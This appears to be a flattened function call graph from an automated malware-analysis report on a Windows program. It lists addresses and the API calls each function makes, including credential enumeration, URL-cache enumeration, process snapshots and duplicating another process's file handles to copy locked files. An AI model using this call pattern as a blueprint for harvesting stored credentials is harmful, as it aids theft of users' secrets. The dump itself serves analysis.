4455a8 memset 38768->38769 38912 4457f2 38768->38912 39048 403988 38769->39048 38776 445854 38777 4458aa 38776->38777 39174 403c9c memset memset memset memset memset 38776->39174 38779 44594a 38777->38779 38780 4458bb memset memset 38777->38780 38778 445672 39059 403fbe memset memset memset memset memset 38778->39059 38782 4459ed 38779->38782 38783 44595e memset memset 38779->38783 38785 414c2e 16 API calls 38780->38785 38788 445a00 memset memset 38782->38788 38789 445b22 38782->38789 38790 414c2e 16 API calls 38783->38790 38784 4455e5 38784->38778 38802 44560f 38784->38802 38791 4458f9 38785->38791 39197 414c2e 38788->39197 38794 445bca 38789->38794 38795 445b38 memset memset memset 38789->38795 38800 44599c 38790->38800 38801 40b2cc 27 API calls 38791->38801 38812 445c8b memset memset 38794->38812 38862 445cf0 38794->38862 38807 445bd4 38795->38807 38808 445b98 38795->38808 38796 445849 39262 40b1ab free free 38796->39262 38811 40b2cc 27 API calls 38800->38811 38813 445909 38801->38813 38804 4087b3 338 API calls 38802->38804 38823 445621 38804->38823 38806 44589f 39263 40b1ab free free 38806->39263 38820 414c2e 16 API calls 38807->38820 38808->38807 38816 445ba2 38808->38816 38825 4459ac 38811->38825 38814 414c2e 16 API calls 38812->38814 38822 409d1f 6 API calls 38813->38822 38826 445cc9 38814->38826 39335 4099c6 wcslen 38816->39335 38817 4456b2 39250 40b1ab free free 38817->39250 38819 40b2cc 27 API calls 38829 445a4f 38819->38829 38831 445be2 38820->38831 38821 403335 38961 4452e5 45 API calls 38821->38961 38834 445919 38822->38834 39248 4454bf 20 API calls 38823->39248 38824 445823 38824->38796 38842 4087b3 338 API calls 38824->38842 38835 409d1f 6 API calls 38825->38835 38836 409d1f 6 API calls 38826->38836 38827 445879 38827->38806 38846 4087b3 338 API calls 38827->38846 39212 409d1f wcslen wcslen 38829->39212 38840 40b2cc 27 API calls 38831->38840 38832 445d3d 38860 40b2cc 27 API calls 38832->38860 38833 445d88 memset memset memset 38843 414c2e 16 API calls 38833->38843 39264 409b98 GetFileAttributesW 38834->39264 38844 4459bc 38835->38844 38845 445ce1 38836->38845 38837 445bb3 39338 445403 memset 38837->39338 38838 445680 38838->38817 39082 4087b3 memset 38838->39082 38849 445bf3 38840->38849 38842->38824 38852 445dde 38843->38852 39331 409b98 GetFileAttributesW 38844->39331 39355 409b98 GetFileAttributesW 38845->39355 38846->38827 38859 409d1f 6 API calls 38849->38859 38850 445928 38850->38779 39265 40b6ef 38850->39265 38861 40b2cc 27 API calls 38852->38861 38854 4459cb 38854->38782 38871 40b6ef 252 API calls 38854->38871 38858 40b2cc 27 API calls 38864 445a94 38858->38864 38866 445c07 38859->38866 38867 445d54 _wcsicmp 38860->38867 38870 445def 38861->38870 38862->38821 38862->38832 38862->38833 38863 445389 258 API calls 38863->38794 39217 40ae18 38864->39217 38865 44566d 38865->38912 39133 413d4c 38865->39133 38874 445389 258 API calls 38866->38874 38875 445d71 38867->38875 38938 445d67 38867->38938 38869 445665 39249 40b1ab free free 38869->39249 38876 409d1f 6 API calls 38870->38876 38871->38782 38879 445c17 38874->38879 39356 445093 23 API calls 38875->39356 38882 445e03 38876->38882 38878 4456d8 38884 40b2cc 27 API calls 38878->38884 38885 40b2cc 27 API calls 38879->38885 38881 44563c 38881->38869 38887 4087b3 338 API calls 38881->38887 39357 409b98 GetFileAttributesW 38882->39357 38883 40b6ef 252 API calls 38883->38821 38889 4456e2 38884->38889 38890 445c23 38885->38890 38886 445d83 38886->38821 38887->38881 39251 413fa6 _wcsicmp _wcsicmp 38889->39251 38894 409d1f 6 API calls 38890->38894 38892 445e12 38895 445e6b 38892->38895 38899 40b2cc 27 API calls 38892->38899 38897 445c37 38894->38897 39359 445093 23 API calls 38895->39359 38896 4456eb 38902 4456fd memset memset memset memset 38896->38902 38903 4457ea 38896->38903 38904 445389 258 API calls 38897->38904 38898 445b17 39332 40aebe 38898->39332 38906 445e33 38899->38906 39252 409c70 wcscpy wcsrchr 38902->39252 39255 413d29 38903->39255 38910 445c47 38904->38910 38911 409d1f 6 API calls 38906->38911 38908 445e7e 38913 445f67 38908->38913 38916 40b2cc 27 API calls 38910->38916 38917 445e47 38911->38917 38912->38776 39151 403e2d memset memset memset memset memset 38912->39151 38918 40b2cc 27 API calls 38913->38918 38914 445ab2 memset 38919 40b2cc 27 API calls 38914->38919 38921 445c53 38916->38921 39358 409b98 GetFileAttributesW 38917->39358 38923 445f73 38918->38923 38924 445aa1 38919->38924 38920 409c70 2 API calls 38925 44577e 38920->38925 38926 409d1f 6 API calls 38921->38926 38928 409d1f 6 API calls 38923->38928 38924->38898 38924->38914 38929 409d1f 6 API calls 38924->38929 39224 40add4 38924->39224 39229 445389 38924->39229 39238 40ae51 38924->39238 38930 409c70 2 API calls 38925->38930 38931 445c67 38926->38931 38927 445e56 38927->38895 38935 445e83 memset 38927->38935 38932 445f87 38928->38932 38929->38924 38933 44578d 38930->38933 38934 445389 258 API calls 38931->38934 39362 409b98 GetFileAttributesW 38932->39362 38933->38903 38940 40b2cc 27 API calls 38933->38940 38934->38794 38939 40b2cc 27 API calls 38935->38939 38938->38821 38938->38883 38941 445eab 38939->38941 38942 4457a8 38940->38942 38943 409d1f 6 API calls 38941->38943 38944 409d1f 6 API calls 38942->38944 38946 445ebf 38943->38946 38945 4457b8 38944->38945 39254 409b98 GetFileAttributesW 38945->39254 38948 40ae18 9 API calls 38946->38948 38952 445ef5 38948->38952 38949 4457c7 38949->38903 38951 4087b3 338 API calls 38949->38951 38950 40ae51 9 API calls 38950->38952 38951->38903 38952->38950 38953 445f5c 38952->38953 38955 40add4 2 API calls 38952->38955 38956 40b2cc 27 API calls 38952->38956 38957 409d1f 6 API calls 38952->38957 38959 445f3a 38952->38959 39360 409b98 GetFileAttributesW 38952->39360 38954 40aebe FindClose 38953->38954 38954->38913 38955->38952 38956->38952 38957->38952 39361 445093 23 API calls 38959->39361 38961->38758 38962->38760 38963->38758 38964->38753 38966 40c775 38965->38966 39363 40b1ab free free 38966->39363 38968 40c788 39364 40b1ab free free 38968->39364 38970 40c790 39365 40b1ab free free 38970->39365 38972 40c798 38973 40aa04 free 38972->38973 38974 40c7a0 38973->38974 39366 40c274 memset 38974->39366 38979 40a8ab 9 API calls 38980 40c7c3 38979->38980 38981 40a8ab 9 API calls 38980->38981 38982 40c7d0 38981->38982 39395 40c3c3 38982->39395 38986 40c877 38995 40bdb0 38986->38995 38987 40c86c 39437 4053fe 39 API calls 38987->39437 38993 40c7e5 38993->38986 38993->38987 38994 40c634 49 API calls 38993->38994 39420 40a706 38993->39420 38994->38993 39627 404363 38995->39627 38998 40bf5d 39647 40440c 38998->39647 39000 40bdee 39000->38998 39003 40b2cc 27 API calls 39000->39003 39001 40bddf CredEnumerateW 39001->39000 39004 40be02 wcslen 39003->39004 39004->38998 39012 40be1e 39004->39012 39005 40be26 wcsncmp 39005->39012 39008 40be7d memset 39009 40bea7 memcpy 39008->39009 39008->39012 39010 40bf11 wcschr 39009->39010 39009->39012 39010->39012 39011 40b2cc 27 API calls 39013 40bef6 _wcsnicmp 39011->39013 39012->38998 39012->39005 39012->39008 39012->39009 39012->39010 39012->39011 39014 40bf43 LocalFree 39012->39014 39650 40bd5d 28 API calls 39012->39650 39651 404423 39012->39651 39013->39010 39013->39012 39014->39012 39015 4135f7 39664 4135e0 39015->39664 39049 40399d 39048->39049 39693 403a16 39049->39693 39052 403a12 wcsrchr 39052->38784 39055 4039a3 39056 4039f4 39055->39056 39058 403a09 39055->39058 39704 40a02c CreateFileW 39055->39704 39057 4099c6 2 API calls 39056->39057 39056->39058 39057->39058 39707 40b1ab free free 39058->39707 39060 414c2e 16 API calls 39059->39060 39061 404048 39060->39061 39062 414c2e 16 API calls 39061->39062 39063 404056 39062->39063 39064 409d1f 6 API calls 39063->39064 39065 404073 39064->39065 39066 409d1f 6 API calls 39065->39066 39067 40408e 39066->39067 39068 409d1f 6 API calls 39067->39068 39069 4040a6 39068->39069 39070 403af5 20 API calls 39069->39070 39071 4040ba 39070->39071 39072 403af5 20 API calls 39071->39072 39073 4040cb 39072->39073 39734 40414f memset 39073->39734 39075 404140 39748 40b1ab free free 39075->39748 39076 4040ec memset 39080 4040e0 39076->39080 39078 404148 39078->38838 39079 4099c6 2 API calls 39079->39080 39080->39075 39080->39076 39080->39079 39081 40a8ab 9 API calls 39080->39081 39081->39080 39761 40a6e6 WideCharToMultiByte 39082->39761 39084 4087ed 39762 4095d9 memset 39084->39762 39134 40b633 free 39133->39134 39135 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39134->39135 39136 413f00 Process32NextW 39135->39136 39137 413da5 OpenProcess 39136->39137 39138 413f17 CloseHandle 39136->39138 39139 413df3 memset 39137->39139 39140 413eb0 39137->39140 39138->38878 40000 413f27 39139->40000 39140->39136 39142 413ebf free 39140->39142 39143 4099f4 3 API calls 39140->39143 39142->39140 39143->39140 39145 413e37 GetModuleHandleW 39147 413e1f 39145->39147 39148 413e46 GetProcAddress 39145->39148 39146 413e6a QueryFullProcessImageNameW 39146->39147 39147->39145 39147->39146 40005 413959 39147->40005 40021 413ca4 39147->40021 39148->39147 39150 413ea2 CloseHandle 39150->39140 39152 414c2e 16 API calls 39151->39152 39153 403eb7 39152->39153 39154 414c2e 16 API calls 39153->39154 39155 403ec5 39154->39155 39156 409d1f 6 API calls 39155->39156 39157 403ee2 39156->39157 39158 409d1f 6 API calls 39157->39158 39159 403efd 39158->39159 39160 409d1f 6 API calls 39159->39160 39161 403f15 39160->39161 39162 403af5 20 API calls 39161->39162 39163 403f29 39162->39163 39164 403af5 20 API calls 39163->39164 39165 403f3a 39164->39165 39166 40414f 33 API calls 39165->39166 39172 403f4f 39166->39172 39167 403faf 40035 40b1ab free free 39167->40035 39169 403f5b memset 39169->39172 39170 403fb7 39170->38824 39171 4099c6 2 API calls 39171->39172 39172->39167 39172->39169 39172->39171 39173 40a8ab 9 API calls 39172->39173 39173->39172 39175 414c2e 16 API calls 39174->39175 39176 403d26 39175->39176 39177 414c2e 16 API calls 39176->39177 39178 403d34 39177->39178 39179 409d1f 6 API calls 39178->39179 39180 403d51 39179->39180 39181 409d1f 6 API calls 39180->39181 39182 403d6c 39181->39182 39183 409d1f 6 API calls 39182->39183 39184 403d84 39183->39184 39185 403af5 20 API calls 39184->39185 39186 403d98 39185->39186 39187 403af5 20 API calls 39186->39187 39188 403da9 39187->39188 39189 40414f 33 API calls 39188->39189 39195 403dbe 39189->39195 39190 403e1e 40036 40b1ab free free 39190->40036 39191 403dca memset 39191->39195 39193 403e26 39193->38827 39194 4099c6 2 API calls 39194->39195 39195->39190 39195->39191 39195->39194 39196 40a8ab 9 API calls 39195->39196 39196->39195 39198 414b81 9 API calls 39197->39198 39199 414c40 39198->39199 39200 414c73 memset 39199->39200 40037 409cea 39199->40037 39203 414c94 39200->39203 39202 414c64 39202->38819 40040 414592 RegOpenKeyExW 39203->40040 39206 414cc1 39207 414cf4 wcscpy 39206->39207 40041 414bb0 wcscpy 39206->40041 39207->39202 39209 414cd2 40042 4145ac RegQueryValueExW 39209->40042 39211 414ce9 RegCloseKey 39211->39207 39213 409d62 39212->39213 39214 409d43 wcscpy 39212->39214 39213->38858 39215 409719 2 API calls 39214->39215 39216 409d51 wcscat 39215->39216 39216->39213 39218 40aebe FindClose 39217->39218 39219 40ae21 39218->39219 39220 4099c6 2 API calls 39219->39220 39221 40ae35 39220->39221 39222 409d1f 6 API calls 39221->39222 39223 40ae49 39222->39223 39223->38924 39225 40ade0 39224->39225 39226 40ae0f 39224->39226 39225->39226 39227 40ade7 wcscmp 39225->39227 39226->38924 39227->39226 39228 40adfe wcscmp 39227->39228 39228->39226 39230 40ae18 9 API calls 39229->39230 39236 4453c4 39230->39236 39231 40ae51 9 API calls 39231->39236 39232 4453f3 39233 40aebe FindClose 39232->39233 39235 4453fe 39233->39235 39234 40add4 2 API calls 39234->39236 39235->38924 39236->39231 39236->39232 39236->39234 39237 445403 253 API calls 39236->39237 39237->39236 39239 40ae7b FindNextFileW 39238->39239 39240 40ae5c FindFirstFileW 39238->39240 39241 40ae94 39239->39241 39242 40ae8f 39239->39242 39240->39241 39244 40aeb6 39241->39244 39245 409d1f 6 API calls 39241->39245 39243 40aebe FindClose 39242->39243 39243->39241 39244->38924 39245->39244 39248->38881 39249->38865 39250->38865 39251->38896 39253 409c89 39252->39253 39253->38920 39254->38949 39256 413d39 39255->39256 39257 413d2f FreeLibrary 39255->39257 39258 40b633 free 39256->39258 39257->39256 39259 413d42 39258->39259 39260 40b633 free 39259->39260 39261 413d4a 39260->39261 39261->38912 39262->38776 39263->38777 39264->38850 39266 44db70 39265->39266 39267 40b6fc memset 39266->39267 39268 409c70 2 API calls 39267->39268 39269 40b732 wcsrchr 39268->39269 39270 40b743 39269->39270 39271 40b746 memset 39269->39271 39270->39271 39272 40b2cc 27 API calls 39271->39272 39273 40b76f 39272->39273 39274 409d1f 6 API calls 39273->39274 39275 40b783 39274->39275 40043 409b98 GetFileAttributesW 39275->40043 39277 40b792 39278 409c70 2 API calls 39277->39278 39292 40b7c2 39277->39292 39280 40b7a5 39278->39280 39282 40b2cc 27 API calls 39280->39282 39286 40b7b2 39282->39286 39283 40b837 CloseHandle 39285 40b83e memset 39283->39285 39284 40b817 40078 409a45 GetTempPathW 39284->40078 40077 40a6e6 WideCharToMultiByte 39285->40077 39290 409d1f 6 API calls 39286->39290 39288 40b827 CopyFileW 39288->39285 39290->39292 39291 40b866 39293 444432 121 API calls 39291->39293 40044 40bb98 39292->40044 39294 40b879 39293->39294 39295 40bad5 39294->39295 39296 40b273 27 API calls 39294->39296 39297 40baeb 39295->39297 39298 40bade DeleteFileW 39295->39298 39299 40b89a 39296->39299 39300 40b04b ??3@YAXPAX 39297->39300 39298->39297 39301 438552 134 API calls 39299->39301 39302 40baf3 39300->39302 39303 40b8a4 39301->39303 39302->38779 39304 40bacd 39303->39304 39306 4251c4 137 API calls 39303->39306 39305 443d90 111 API calls 39304->39305 39305->39295 39329 40b8b8 39306->39329 39307 40bac6 40090 424f26 123 API calls 39307->40090 39308 40b8bd memset 40081 425413 17 API calls 39308->40081 39311 425413 17 API calls 39311->39329 39314 40a71b MultiByteToWideChar 39314->39329 39315 40a734 MultiByteToWideChar 39315->39329 39318 40b9b5 memcmp 39318->39329 39319 4099c6 2 API calls 39319->39329 39320 404423 37 API calls 39320->39329 39323 40bb3e memset memcpy 40091 40a734 MultiByteToWideChar 39323->40091 39324 4251c4 137 API calls 39324->39329 39326 40bb88 LocalFree 39326->39329 39329->39307 39329->39308 39329->39311 39329->39314 39329->39315 39329->39318 39329->39319 39329->39320 39329->39323 39329->39324 39330 40ba5f memcmp 39329->39330 40082 4253ef 16 API calls 39329->40082 40083 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39329->40083 40084 4253af 17 API calls 39329->40084 40085 4253cf 17 API calls 39329->40085 40086 447280 memset 39329->40086 40087 447960 memset memcpy memcpy memcpy 39329->40087 40088 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39329->40088 40089 447920 memcpy memcpy memcpy 39329->40089 39330->39329 39331->38854 39333 40aed1 39332->39333 39334 40aec7 FindClose 39332->39334 39333->38789 39334->39333 39336 4099d7 39335->39336 39337 4099da memcpy 39335->39337 39336->39337 39337->38837 39339 40b2cc 27 API calls 39338->39339 39340 44543f 39339->39340 39341 409d1f 6 API calls 39340->39341 39342 44544f 39341->39342 40183 409b98 GetFileAttributesW 39342->40183 39344 445476 39347 40b2cc 27 API calls 39344->39347 39345 44545e 39345->39344 39346 40b6ef 252 API calls 39345->39346 39346->39344 39348 445482 39347->39348 39349 409d1f 6 API calls 39348->39349 39350 445492 39349->39350 40184 409b98 GetFileAttributesW 39350->40184 39352 4454a1 39353 4454b9 39352->39353 39354 40b6ef 252 API calls 39352->39354 39353->38863 39354->39353 39355->38862 39356->38886 39357->38892 39358->38927 39359->38908 39360->38952 39361->38952 39362->38938 39363->38968 39364->38970 39365->38972 39367 414c2e 16 API calls 39366->39367 39368 40c2ae 39367->39368 39438 40c1d3 39368->39438 39373 40c3be 39390 40a8ab 39373->39390 39374 40afcf 2 API calls 39375 40c2fd FindFirstUrlCacheEntryW 39374->39375 39376 40c3b6 39375->39376 39377 40c31e wcschr 39375->39377 39378 40b04b ??3@YAXPAX 39376->39378 39379 40c331 39377->39379 39380 40c35e FindNextUrlCacheEntryW 39377->39380 39378->39373 39381 40a8ab 9 API calls 39379->39381 39380->39377 39382 40c373 GetLastError 39380->39382 39385 40c33e wcschr 39381->39385 39383 40c3ad FindCloseUrlCache 39382->39383 39384 40c37e 39382->39384 39383->39376 39386 40afcf 2 API calls 39384->39386 39385->39380 39387 40c34f 39385->39387 39388 40c391 FindNextUrlCacheEntryW 39386->39388 39389 40a8ab 9 API calls 39387->39389 39388->39377 39388->39383 39389->39380 39554 40a97a 39390->39554 39393 40a8cc 39393->38979 39394 40a8d0 7 API calls 39394->39393 39559 40b1ab free free 39395->39559 39397 40c3dd 39398 40b2cc 27 API calls 39397->39398 39399 40c3e7 39398->39399 39560 414592 RegOpenKeyExW 39399->39560 39401 40c3f4 39402 40c50e 39401->39402 39403 40c3ff 39401->39403 39417 405337 39402->39417 39404 40a9ce 4 API calls 39403->39404 39405 40c418 memset 39404->39405 39561 40aa1d 39405->39561 39408 40c471 39410 40c47a _wcsupr 39408->39410 39409 40c505 RegCloseKey 39409->39402 39411 40a8d0 7 API calls 39410->39411 39412 40c498 39411->39412 39413 40a8d0 7 API calls 39412->39413 39414 40c4ac memset 39413->39414 39415 40aa1d 39414->39415 39416 40c4e4 RegEnumValueW 39415->39416 39416->39409 39416->39410 39563 405220 39417->39563 39421 4099c6 2 API calls 39420->39421 39422 40a714 _wcslwr 39421->39422 39423 40c634 39422->39423 39620 405361 39423->39620 39426 40c65c wcslen 39623 4053b6 39 API calls 39426->39623 39427 40c71d wcslen 39427->38993 39429 40c677 39430 40c713 39429->39430 39624 40538b 39 API calls 39429->39624 39626 4053df 39 API calls 39430->39626 39433 40c6a5 39433->39430 39434 40c6a9 memset 39433->39434 39435 40c6d3 39434->39435 39437->38986 39439 40ae18 9 API calls 39438->39439 39445 40c210 39439->39445 39440 40ae51 9 API calls 39440->39445 39441 40c264 39442 40aebe FindClose 39441->39442 39444 40c26f 39442->39444 39443 40add4 2 API calls 39443->39445 39450 40e5ed memset memset 39444->39450 39445->39440 39445->39441 39445->39443 39446 40c231 _wcsicmp 39445->39446 39447 40c1d3 35 API calls 39445->39447 39446->39445 39448 40c248 39446->39448 39447->39445 39463 40c084 22 API calls 39448->39463 39451 414c2e 16 API calls 39450->39451 39452 40e63f 39451->39452 39453 409d1f 6 API calls 39452->39453 39454 40e658 39453->39454 39464 409b98 GetFileAttributesW 39454->39464 39456 40e667 39457 40e680 39456->39457 39458 409d1f 6 API calls 39456->39458 39465 409b98 GetFileAttributesW 39457->39465 39458->39457 39460 40e68f 39462 40c2d8 39460->39462 39466 40e4b2 39460->39466 39462->39373 39462->39374 39463->39445 39464->39456 39465->39460 39487 40e01e 39466->39487 39468 40e593 39469 40e5b0 39468->39469 39470 40e59c DeleteFileW 39468->39470 39472 40b04b ??3@YAXPAX 39469->39472 39470->39469 39471 40e521 39471->39468 39510 40e175 39471->39510 39473 40e5bb 39472->39473 39475 40e5c4 CloseHandle 39473->39475 39476 40e5cc 39473->39476 39475->39476 39478 40b633 free 39476->39478 39477 40e573 39480 40e584 39477->39480 39481 40e57c CloseHandle 39477->39481 39479 40e5db 39478->39479 39483 40b633 free 39479->39483 39553 40b1ab free free 39480->39553 39481->39480 39482 40e540 39482->39477 39530 40e2ab 39482->39530 39485 40e5e3 39483->39485 39485->39462 39488 406214 22 API calls 39487->39488 39489 40e03c 39488->39489 39490 40e16b 39489->39490 39491 40dd85 75 API calls 39489->39491 39490->39471 39492 40e06b 39491->39492 39492->39490 39493 40afcf ??2@YAPAXI ??3@YAXPAX 39492->39493 39494 40e08d OpenProcess 39493->39494 39495 40e0a4 GetCurrentProcess DuplicateHandle 39494->39495 39499 40e152 39494->39499 39496 40e0d0 GetFileSize 39495->39496 39497 40e14a CloseHandle 39495->39497 39500 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39496->39500 39497->39499 39498 40e160 39502 40b04b ??3@YAXPAX 39498->39502 39499->39498 39501 406214 22 API calls 39499->39501 39503 40e0ea 39500->39503 39501->39498 39502->39490 39504 4096dc CreateFileW 39503->39504 39505 40e0f1 CreateFileMappingW 39504->39505 39506 40e140 CloseHandle CloseHandle 39505->39506 39507 40e10b MapViewOfFile 39505->39507 39506->39497 39508 40e13b CloseHandle 39507->39508 39509 40e11f WriteFile UnmapViewOfFile 39507->39509 39508->39506 39509->39508 39511 40e18c 39510->39511 39512 406b90 11 API calls 39511->39512 39513 40e19f 39512->39513 39514 40e1a7 memset 39513->39514 39515 40e299 39513->39515 39520 40e1e8 39514->39520 39516 4069a3 ??3@YAXPAX free 39515->39516 39517 40e2a4 39516->39517 39517->39482 39518 406e8f 13 API calls 39518->39520 39519 406b53 SetFilePointerEx ReadFile 39519->39520 39520->39518 39520->39519 39521 40e283 39520->39521 39522 40dd50 _wcsicmp 39520->39522 39526 40742e 8 API calls 39520->39526 39527 40aae3 wcslen wcslen _memicmp 39520->39527 39528 40e244 _snwprintf 39520->39528 39523 40e291 39521->39523 39524 40e288 free 39521->39524 39522->39520 39525 40aa04 free 39523->39525 39524->39523 39525->39515 39526->39520 39527->39520 39529 40a8d0 7 API calls 39528->39529 39529->39520 39531 40e2c2 39530->39531 39532 406b90 11 API calls 39531->39532 39552 40e2d3 39532->39552 39533 40e4a0 39534 4069a3 ??3@YAXPAX free 39533->39534 39536 40e4ab 39534->39536 39535 406e8f 13 API calls 39535->39552 39536->39482 39537 406b53 SetFilePointerEx ReadFile 39537->39552 39538 40e489 39539 40aa04 free 39538->39539 39540 40e491 39539->39540 39540->39533 39541 40e497 free 39540->39541 39541->39533 39542 40dd50 _wcsicmp 39542->39552 39543 40dd50 _wcsicmp 39544 40e376 memset 39543->39544 39545 40aa29 6 API calls 39544->39545 39545->39552 39546 40742e 8 API calls 39546->39552 39547 40e3e0 memcpy 39547->39552 39548 40e3b3 wcschr 39548->39552 39549 40e3fb memcpy 39549->39552 39550 40e416 memcpy 39550->39552 39551 40e431 memcpy 39551->39552 39552->39533 39552->39535 39552->39537 39552->39538 39552->39542 39552->39543 39552->39546 39552->39547 39552->39548 39552->39549 39552->39550 39552->39551 39553->39468 39556 40a980 39554->39556 39555 40a8bb 39555->39393 39555->39394 39556->39555 39557 40a995 _wcsicmp 39556->39557 39558 40a99c wcscmp 39556->39558 39557->39556 39558->39556 39559->39397 39560->39401 39562 40aa23 RegEnumValueW 39561->39562 39562->39408 39562->39409 39564 405335 39563->39564 39565 40522a 39563->39565 39564->38993 39566 40b2cc 27 API calls 39565->39566 39567 405234 39566->39567 39568 40a804 8 API calls 39567->39568 39569 40523a 39568->39569 39608 40b273 39569->39608 39571 405248 _mbscpy _mbscat GetProcAddress 39572 40b273 27 API calls 39571->39572 39573 405279 39572->39573 39611 405211 GetProcAddress 39573->39611 39575 405282 39576 40b273 27 API calls 39575->39576 39577 40528f 39576->39577 39609 40b58d 27 API calls 39608->39609 39610 40b18c 39609->39610 39610->39571 39611->39575 39621 405220 39 API calls 39620->39621 39622 405369 39621->39622 39622->39426 39622->39427 39623->39429 39624->39433 39626->39427 39628 40440c FreeLibrary 39627->39628 39629 40436d 39628->39629 39630 40a804 8 API calls 39629->39630 39631 404377 39630->39631 39632 404383 39631->39632 39633 404405 39631->39633 39634 40b273 27 API calls 39632->39634 39633->38998 39633->39000 39633->39001 39635 40438d GetProcAddress 39634->39635 39636 40b273 27 API calls 39635->39636 39637 4043a7 GetProcAddress 39636->39637 39638 40b273 27 API calls 39637->39638 39648 404413 FreeLibrary 39647->39648 39649 40441e 39647->39649 39648->39649 39649->39015 39650->39012 39652 40442e 39651->39652 39654 40447e 39651->39654 39654->39012 39665 4135f6 39664->39665 39666 4135eb FreeLibrary 39664->39666 39666->39665 39694 403a29 39693->39694 39708 403bed memset memset 39694->39708 39696 403ae7 39721 40b1ab free free 39696->39721 39697 403a3f memset 39702 403a2f 39697->39702 39699 403aef 39699->39055 39700 409d1f 6 API calls 39700->39702 39701 409b98 GetFileAttributesW 39701->39702 39702->39696 39702->39697 39702->39700 39702->39701 39703 40a8d0 7 API calls 39702->39703 39703->39702 39705 40a051 GetFileTime CloseHandle 39704->39705 39706 4039ca CompareFileTime 39704->39706 39705->39706 39706->39055 39707->39052 39709 414c2e 16 API calls 39708->39709 39710 403c38 39709->39710 39711 409719 2 API calls 39710->39711 39712 403c3f wcscat 39711->39712 39713 414c2e 16 API calls 39712->39713 39714 403c61 39713->39714 39715 409719 2 API calls 39714->39715 39716 403c68 wcscat 39715->39716 39722 403af5 39716->39722 39719 403af5 20 API calls 39720 403c95 39719->39720 39720->39702 39721->39699 39723 403b02 39722->39723 39724 40ae18 9 API calls 39723->39724 39726 403b37 39724->39726 39725 40ae51 9 API calls 39725->39726 39726->39725 39727 403bdb 39726->39727 39728 40add4 wcscmp wcscmp 39726->39728 39731 40ae18 9 API calls 39726->39731 39732 40aebe FindClose 39726->39732 39733 40a8d0 7 API calls 39726->39733 39729 40aebe FindClose 39727->39729 39728->39726 39730 403be6 39729->39730 39730->39719 39731->39726 39732->39726 39733->39726 39735 409d1f 6 API calls 39734->39735 39736 404190 39735->39736 39749 409b98 GetFileAttributesW 39736->39749 39738 40419c 39739 4041a7 6 API calls 39738->39739 39740 40435c 39738->39740 39742 40424f 39739->39742 39740->39080 39742->39740 39743 40425e memset 39742->39743 39745 409d1f 6 API calls 39742->39745 39746 40a8ab 9 API calls 39742->39746 39750 414842 39742->39750 39743->39742 39744 404296 wcscpy 39743->39744 39744->39742 39745->39742 39747 4042b6 memset memset _snwprintf wcscpy 39746->39747 39747->39742 39748->39078 39749->39738 39753 41443e 39750->39753 39752 414866 39752->39742 39754 41444b 39753->39754 39755 414451 39754->39755 39756 4144a3 GetPrivateProfileStringW 39754->39756 39757 414491 39755->39757 39758 414455 wcschr 39755->39758 39756->39752 39760 414495 WritePrivateProfileStringW 39757->39760 39758->39757 39759 414463 _snwprintf 39758->39759 39759->39760 39760->39752 39761->39084 39763 40b2cc 27 API calls 39762->39763 40027 413f4f 40000->40027 40003 413f37 K32GetModuleFileNameExW 40004 413f4a 40003->40004 40004->39147 40006 413969 wcscpy 40005->40006 40007 41396c wcschr 40005->40007 40010 413a3a 40006->40010 40007->40006 40009 41398e 40007->40009 40032 4097f7 wcslen wcslen _memicmp 40009->40032 40010->39147 40012 41399a 40013 4139a4 memset 40012->40013 40014 4139e6 40012->40014 40033 409dd5 GetWindowsDirectoryW wcscpy 40013->40033 40016 413a31 wcscpy 40014->40016 40017 4139ec memset 40014->40017 40016->40010 40034 409dd5 GetWindowsDirectoryW wcscpy 40017->40034 40018 4139c9 wcscpy wcscat 40018->40010 40020 413a11 memcpy wcscat 40020->40010 40022 413cb0 GetModuleHandleW 40021->40022 40023 413cda 40021->40023 40022->40023 40024 413cbf GetProcAddress 40022->40024 40025 413ce3 GetProcessTimes 40023->40025 40026 413cf6 40023->40026 40024->40023 40025->39150 40026->39150 40028 413f2f 40027->40028 40029 413f54 40027->40029 40028->40003 40028->40004 40030 40a804 8 API calls 40029->40030 40031 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40030->40031 40031->40028 40032->40012 40033->40018 40034->40020 40035->39170 40036->39193 40038 409cf9 GetVersionExW 40037->40038 40039 409d0a 40037->40039 40038->40039 40039->39200 40039->39202 40040->39206 40041->39209 40042->39211 40043->39277 40045 40bba5 40044->40045 40092 40cc26 40045->40092 40048 40bd4b 40113 40cc0c 40048->40113 40053 40b2cc 27 API calls 40054 40bbef 40053->40054 40120 40ccf0 _wcsicmp 40054->40120 40056 40bbf5 40056->40048 40121 40ccb4 6 API calls 40056->40121 40058 40bc26 40059 40cf04 17 API calls 40058->40059 40060 40bc2e 40059->40060 40061 40bd43 40060->40061 40062 40b2cc 27 API calls 40060->40062 40063 40cc0c 4 API calls 40061->40063 40064 40bc40 40062->40064 40063->40048 40122 40ccf0 _wcsicmp 40064->40122 40066 40bc46 40066->40061 40067 40bc61 memset memset WideCharToMultiByte 40066->40067 40123 40103c strlen 40067->40123 40069 40bcc0 40070 40b273 27 API calls 40069->40070 40071 40bcd0 memcmp 40070->40071 40071->40061 40072 40bce2 40071->40072 40073 404423 37 API calls 40072->40073 40074 40bd10 40073->40074 40074->40061 40075 40bd3a LocalFree 40074->40075 40076 40bd1f memcpy 40074->40076 40075->40061 40076->40075 40077->39291 40079 409a74 GetTempFileNameW 40078->40079 40080 409a66 GetWindowsDirectoryW 40078->40080 40079->39288 40080->40079 40081->39329 40082->39329 40083->39329 40084->39329 40085->39329 40086->39329 40087->39329 40088->39329 40089->39329 40090->39304 40091->39326 40124 4096c3 CreateFileW 40092->40124 40094 40cc34 40095 40cc3d GetFileSize 40094->40095 40096 40bbca 40094->40096 40097 40afcf 2 API calls 40095->40097 40096->40048 40104 40cf04 40096->40104 40098 40cc64 40097->40098 40125 40a2ef ReadFile 40098->40125 40100 40cc71 40126 40ab4a MultiByteToWideChar 40100->40126 40102 40cc95 CloseHandle 40103 40b04b ??3@YAXPAX 40102->40103 40103->40096 40105 40b633 free 40104->40105 40106 40cf14 40105->40106 40132 40b1ab free free 40106->40132 40108 40bbdd 40108->40048 40108->40053 40109 40cf1b 40109->40108 40111 40cfef 40109->40111 40133 40cd4b 40109->40133 40112 40cd4b 14 API calls 40111->40112 40112->40108 40114 40b633 free 40113->40114 40115 40cc15 40114->40115 40116 40aa04 free 